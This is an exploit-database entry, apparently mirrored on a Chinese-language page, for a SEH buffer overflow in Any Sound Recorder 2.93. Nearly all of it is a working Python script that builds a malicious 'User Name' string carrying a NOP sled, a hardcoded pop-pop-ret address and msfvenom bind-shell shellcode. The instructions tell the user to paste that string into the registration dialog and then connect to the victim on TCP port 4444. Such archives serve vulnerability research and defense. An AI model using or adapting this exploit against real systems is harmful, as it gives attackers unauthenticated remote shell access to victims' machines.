Any Sound Recorder 2.93 – Buffer Overflow (SEH)

  • 作者: Abdullah Alıç
    日期: 2018-10-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/45627/
  • # Exploit Title: Any Sound Recorder 2.93 - Buffer Overflow (SEH)
    # Exploit Author: Abdullah Alic
    # Discovery Date: 2018-10-16
    # Homepage: http://www.any-sound-recorder.com
    # Software Link: http://www.any-sound-recorder.com/anysoundrecorder.exe
    # Version: 2.93 
    # Tested on: Windows XP Professional sp3 (ENG)
    # Steps to Reproduce: Run the Python exploit script; it creates a new file
    # named "boom.txt". Copy the content of "boom.txt".
    # Start Any Sound Recorder 2.93, click "Enter Key Code", paste the content into the "User Name" field and click "Register".
    # Then connect to the victim machine on TCP port 4444 (the payload is a bind shell listening there).
    
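    #!/usr/bin/python
    r"""Any Sound Recorder 2.93 - SEH buffer overflow payload generator.

    Writes the crafted "User Name" value to boom.txt in the current
    directory; its contents are pasted into the "Enter Key Code" dialog
    (see the reproduction steps above).  Buffer layout, low to high address:

        NOP * 900 | nSEH (jmp short +6) | SEH (pop pop ret) | shellcode | NOP filler

    The shellcode is an msfvenom windows/shell_bind_tcp payload (default
    LPORT 4444), encoded so that the whole buffer contains none of the bad
    characters \x00, \x0a and \x0d.  The file is written in binary mode so
    the bytes above 0x7f survive unchanged on Python 3 as well as Python 2.
    """
    import sys

    # msfvenom -p windows/shell_bind_tcp -b "\x00\x0a\x0d" -f python
    # Payload size: 355 bytes.
    # NOTE: this is an *unauthenticated* bind shell on TCP/4444 -- anyone who
    # can reach that port on the victim gets the shell, not only the tester.
    SHELLCODE = (
        b"\xb8\x67\x21\x25\x53\xdd\xc0\xd9\x74\x24\xf4\x5b\x31"
        b"\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x8c\xdd\xc7"
        b"\xa6\xae\xf6\x8a\x49\x4e\x07\xeb\xc0\xab\x36\x2b\xb6"
        b"\xb8\x69\x9b\xbc\xec\x85\x50\x90\x04\x1d\x14\x3d\x2b"
        b"\x96\x93\x1b\x02\x27\x8f\x58\x05\xab\xd2\x8c\xe5\x92"
        b"\x1c\xc1\xe4\xd3\x41\x28\xb4\x8c\x0e\x9f\x28\xb8\x5b"
        b"\x1c\xc3\xf2\x4a\x24\x30\x42\x6c\x05\xe7\xd8\x37\x85"
        b"\x06\x0c\x4c\x8c\x10\x51\x69\x46\xab\xa1\x05\x59\x7d"
        b"\xf8\xe6\xf6\x40\x34\x15\x06\x85\xf3\xc6\x7d\xff\x07"
        b"\x7a\x86\xc4\x7a\xa0\x03\xde\xdd\x23\xb3\x3a\xdf\xe0"
        b"\x22\xc9\xd3\x4d\x20\x95\xf7\x50\xe5\xae\x0c\xd8\x08"
        b"\x60\x85\x9a\x2e\xa4\xcd\x79\x4e\xfd\xab\x2c\x6f\x1d"
        b"\x14\x90\xd5\x56\xb9\xc5\x67\x35\xd6\x2a\x4a\xc5\x26"
        b"\x25\xdd\xb6\x14\xea\x75\x50\x15\x63\x50\xa7\x5a\x5e"
        b"\x24\x37\xa5\x61\x55\x1e\x62\x35\x05\x08\x43\x36\xce"
        b"\xc8\x6c\xe3\x7b\xc0\xcb\x5c\x9e\x2d\xab\x0c\x1e\x9d"
        b"\x44\x47\x91\xc2\x75\x68\x7b\x6b\x1d\x95\x84\x82\x82"
        b"\x10\x62\xce\x2a\x75\x3c\x66\x89\xa2\xf5\x11\xf2\x80"
        b"\xad\xb5\xbb\xc2\x6a\xba\x3b\xc1\xdc\x2c\xb0\x06\xd9"
        b"\x4d\xc7\x02\x49\x1a\x50\xd8\x18\x69\xc0\xdd\x30\x19"
        b"\x61\x4f\xdf\xd9\xec\x6c\x48\x8e\xb9\x43\x81\x5a\x54"
        b"\xfd\x3b\x78\xa5\x9b\x04\x38\x72\x58\x8a\xc1\xf7\xe4"
        b"\xa8\xd1\xc1\xe5\xf4\x85\x9d\xb3\xa2\x73\x58\x6a\x05"
        b"\x2d\x32\xc1\xcf\xb9\xc3\x29\xd0\xbf\xcb\x67\xa6\x5f"
        b"\x7d\xde\xff\x60\xb2\xb6\xf7\x19\xae\x26\xf7\xf0\x6a"
        b"\x56\xb2\x58\xda\xff\x1b\x09\x5e\x62\x9c\xe4\x9d\x9b"
        b"\x1f\x0c\x5e\x58\x3f\x65\x5b\x24\x87\x96\x11\x35\x62"
        b"\x98\x86\x36\xa7"
    )

    BADCHARS = b"\x00\x0a\x0d"  # bytes the "User Name" field does not pass through
    NOP = b"\x90"
    NOP_SLED = 900              # NOPs placed before the SEH record
    JUNK = 10000                # bytes after the SEH record: shellcode + NOP filler
    # nSEH: "jmp short +6" hops over the SEH address into the shellcode.
    NSEH = b"\xeb\x06\x90\x90"
    # SEH: 0x72d12f35 = pop ebx # pop ebp # ret 0x0c in msacm32.drv, stored
    # little-endian.  Found on Windows XP Professional SP3 (ENG); on any other
    # build the address must be located again.
    SEH = b"\x35\x2f\xd1\x72"
    OUTPUT = "boom.txt"


    def build_payload(shellcode=SHELLCODE, nop_sled=NOP_SLED, junk=JUNK):
        """Return the complete crash buffer as bytes.

        ``nop_sled`` NOPs, then nSEH and SEH, then ``shellcode`` padded with
        NOPs up to ``junk`` bytes, so the result is always
        ``nop_sled + 8 + junk`` bytes long.

        Raises ValueError if ``shellcode`` does not fit in ``junk`` bytes or
        if the finished buffer contains a bad character; a silently
        truncated or re-encoded payload would otherwise only show up as a
        crash that never reaches the shellcode.
        """
        if len(shellcode) > junk:
            raise ValueError("shellcode is %d bytes but only %d bytes of junk space"
                             % (len(shellcode), junk))
        payload = (NOP * nop_sled + NSEH + SEH
                   + shellcode + NOP * (junk - len(shellcode)))
        found = [c for c in BADCHARS if c in payload]
        if found:
            raise ValueError("payload contains bad character(s): %r" % found)
        return payload


    def main(output=OUTPUT):
        """Build the payload, write it to ``output`` and report; return exit status.

        Returns 0 on success and 1 if the file could not be written.  Only
        the file error is caught, so a size or bad-character problem in
        build_payload still surfaces as a traceback instead of being hidden.
        """
        payload = build_payload()
        print("[+] Creating %s bytes payload..." % len(payload))
        try:
            # Binary mode: no newline translation and no text encoding of the
            # bytes above 0x7f (Python 3 "w" mode would UTF-8 encode them).
            with open(output, "wb") as fh:
                fh.write(payload)
        except (IOError, OSError) as exc:
            print("File cannot be created: %s" % exc)
            return 1
        print("[+] File created!")
        return 0


    if __name__ == "__main__":
        sys.exit(main())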